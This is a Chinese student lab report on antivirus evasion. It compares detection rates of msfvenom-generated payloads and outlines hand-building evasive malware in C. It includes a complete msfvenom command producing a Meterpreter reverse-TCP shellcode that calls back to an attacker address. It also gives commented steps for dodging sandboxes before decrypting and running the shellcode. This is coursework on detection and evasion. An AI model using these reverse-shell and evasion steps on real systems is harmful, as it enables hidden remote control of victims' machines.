实验三 免杀原理与实践
1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
实验步骤如下
-
1.先对实验二中生成的exe进行检测
65款杀毒软件有36款认为不安全
39款杀毒软件有6款认为不安全
what??结果好像有点理想,但是实验还是要尴尬地做下去的 -
2.再试试用msfvenom生成其他格式的文件
-
1.java
首先选择合适的payload
看看测试结果
与exe文件相差无几
?? -
2.jar
-
3.python
-
-
3.veil-evasion
效果很不理想,毕竟是世界知名的产品,早就被AV盯死了
2.通过组合应用各种技术实现恶意代码免杀
很无奈,接下来利用c+shellcode半手工打造恶意代码
-
1.首先在kali中以一个正常的exe文件作为模板生成shellcode数组
msfvenom -p windows/meterpreter/reverse_tcp -x lzj.exe LHOST=192.168.77.138 LPORT=5222 -f c
然后将它拷贝到win7主机的codeblocks中,加几行语句形成如下代码unsigned char met[] = "xa6xb2xd8x5ax5ax5ax3axd3xbfx6bx9ax3exd1x0ax6a" ///////省略若干行 "x99xe1xaaxefxf8x0cx30x5ax09xa5x8f"; int main() { //执行shellcode }编译就可以得到一个能够成功回连的exe文件。
然而会被查出来,所以要用如下代码unsigned char met[] = "xa6xb2xd8x5ax5ax5ax3axd3xbfx6bx9ax3exd1x0ax6a" ...省略一万字 "x99xe1xaaxefxf8x0cx30x5ax09xa5x8f"; int main(int argc, char * argv[]) { //获取当前系统时间 //睡眠20000毫秒 //再次获取当前系统时间 //将两次时间相减看看是否小于19800 //如果小于,可能是AV在检测,停止运行 //如果大于,获取当前进程的内存,如果大于3500000 bytes,可能正在被检测,停止 //如果小于,查看当前文件名是否跟原先一致,若果不一致,停止 //否则解密shellcode、执行shellcode }就能得到一个免杀的恶意代码了。
4.思考题
- 1.杀软是如何检测出恶意代码的?
1.静态检测,将代码与搜集来的知名度高的恶意代码比较。
2.启发式检测,将代码放到沙箱环境中运行,看是否会生成恶意代码或有恶意行为 - 2.免杀是做什么?
绕过AV的检测 - 3.免杀的基本方法有哪些?
加密shellcode、DLL注入、RunPE 等等